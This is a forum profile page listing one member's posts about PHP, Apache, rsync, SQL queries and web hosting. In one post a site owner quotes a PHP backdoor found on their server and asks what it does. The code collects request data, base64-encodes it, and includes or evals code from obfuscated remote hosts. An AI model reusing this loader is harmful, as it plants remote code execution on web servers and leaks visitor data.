Jump to content

bcoffin

Members
  • Posts

    130
  • Joined

  • Last visited

Everything posted by bcoffin

  1. When I browse to ANY .htaccess protected page, IE presents it's security login popup (pic of a keychain in the upper left corner). I can then choose from a dropdown of usernames EVERYTHING ever entered to access a secured page. This is what I wish to clear... There's no reason to store this information otherwise, what's the purpose of IE prompting login in the first place?
  2. I just called them and they said they can recompile php for us but need to know which "flags and libraries" to include. Any suggestions?
  3. I'm leasing a shared server running php5. How do I enable this feature using the Apache Update feature on cpanel?
  4. IE7 thinks it's okay to store my .user/pass entered when accessing an .htaccess-protected webpage -- why it thinks that: i don't know. How do I clear/disable this feature?
  5. I set-up a wireless ad-hoc network on one laptop, running Apache 2.2, PHP 5.2.6, with Windows Vista Home Premium. With a second laptop connected to the first's ad hoc network, I'm able to browse to pages, however it takes incredibly long and times out sometimes. Both laptops are Intel Core 2 duo (2.00GHZ/2.00GHZ) with IntelĀ® Wireless WiFi Link 4965AGN cards. Connection to access points and the web are lightening fast. Is there anything I can do to speed up the wireless ad hoc connection when browsing pages from laptop to laptop? Browsing the file system in Windows Explorer and opening/editing/saving files is quick too. Which leads me to believe that Apache is the bottleneck. Any advice is appreciated. thanks!
  6. Does anybody know of a public API to retrieve STAPLES COPY AND PRINT CENTER locations and FEDEX KINKOS print locations? Either via http request/XML or downloadable sql/cvs? Thanks
  7. it's on a shared server. I've never met a dedicated server worth a hill of beans .. recommendations much welcome. How do you recommend that I "lock down" my shared "portion" ?? Thanks you guys..
  8. Strange, I'm doing a phpupload there, but ignoring all files with extension ".php" .. I'm not sure how it got in there. There were .htaccess files pointing to that php as an error 404 handler, but not sure how they were able to write .htaccess files either.
  9. I just noticed that somebody uploaded this file to my server. Any idea what it does? <? error_reporting(0); $s="e"; $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
  10. Thanks dsaba. I'll hit'm up.
  11. Sorry, y'all. Maybe I just need a place to vent. Maybe you can make some recommendations to change the state of my opinion these days about ANY AND EVERY host. Technicians SHOULD NOT touch support tickets, servers, ANYTHING if they don't know what they're doing. My entire server has been down now for 3 days. Everytime I call support, they tell me to put in a support ticket and things will be handled immediately. Everytime I put in a support ticket I'm told that DNS changes have been made and to please wait 6hrs for them to propagate. Then, when I call back in 6hrs to let them know that nothing is fixed, they tell me that the technician that was working on my case has left for the day and put me on hold for 30min for another technician to bring themself up to speed on the issue. Once they're up to speed, they tell me they will make some DNS changes, for me to submit a support ticket and wait 6hrs, and the process repeats itself. I'm paying $350/mo for my server which includes immediate administrative support. Now why am I paying this much $$, when NOT ONE TECHNICIAN seems to know what they're doing and my site IS STILL DOWN? long story short, now that I've had a chance to vent, please someone recommend: 1. Affordable, Dedicated, Managed Hosting Servers (yea, all three) 2. Technicians that know how to communicate, know what they're doing, and take responsibility their work 3. Preferably a host in my timezone (EST/NYC-NY) who will answer a phone thanks
  12. That's pretty clever. So each time any page is loaded, this script (incl its 3 queries) is run. Do you find this creates heavy overhead? I imagine servers should be able to handle it, just wasn't sure whether this was considered kosh by the masses.
  13. looks like a family tree. a quick search for freeware trees comes up with: http://www.era404.com/products/familytree/?1
  14. so store the sessid to the user table check if an apache session file exists that matches a db record gets pretty complicated, i guess.
  15. just seems like a lot of db activity. I guess this is fine though. I thought maybe we could check session files on the webserver. But this, at least, I understand.
  16. so everytime a page is reloaded, this record is updated?
  17. Can somebody explain how these "Who's Online" features work? Do they check to see if a sessionid exists and isn't expired? Please describe the theory of how these work.
  18. Thanks you guys. WOrked like a charm! ps. Anybody in the NYC area for php/mysql work?
  19. Or maybe I'm supposed to use the SUM(IF(t.trip=1)) AS local, SUM(IF(t.trip=2)) AS domestic?
  20. table: member --- id name zipcode gender table: trips --- id mid (member.id) trip (could be 1 or 2: 1=domestic; 2=abroad) I'd like to query to get: member.name, member.id, count of domestic trips, count of abroad trips I'm thinking: SELECT m.id as mid, m.name, count(t.trip) FROM member m LEFT JOIN trip t ON m.id = t.mid GROUP BY mid,trip or something like that, to return: {1, adam, 4, 2} {2, barb, 7, 16} {4, chris, 42, 2} and so on..
  21. bcoffin

    RSYNC illin'

    And since rsync *is* changing the ownership on the files, I know that it has permissions to do so. It's just not changing them to the correct user/group.
  22. bcoffin

    RSYNC illin'

    Well the group is :nobody, which is what rhel4 uses for web users/php. I know I shouldn't be, but I'm connecting with rsync as root. I've changed this to rsyncuser (a member of nobody) with the same results.
  23. bcoffin

    RSYNC illin'

    I have a couple of installations of a small app (that has a lot of pages, unfortunately) and am looking into rsync to auto-sync all changed files to these boxes. It's working great, using the following: rsync -rptgovz --timeout=300 -e ssh /cygdrive/path/to/local/files/ rsyncuser@111.222.333.444:/home/path/to/one/installation And it's checking the differences, uploading newer files, and everything it's supposed to be doing on that front. However, it's changing all my perms to 0755. And changing all of my user:groups to 401:402 for some reason. Has anybody experienced this? The g and o flags are supposed to retain group and owner attributes. The p flag is supposed to retain the perms. I'm using v2.6.3 and setting (SET CYGWIN=nontsec). Thanks in advance.
  24. Hi wildteen. That works fine for the default document, but unfortunately it has no effect on the form actions. I still need to put the full path in the form actions (http://www.domain.com/form/index.php, not http://www.domain.com/form/) to get the form to find the right location.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.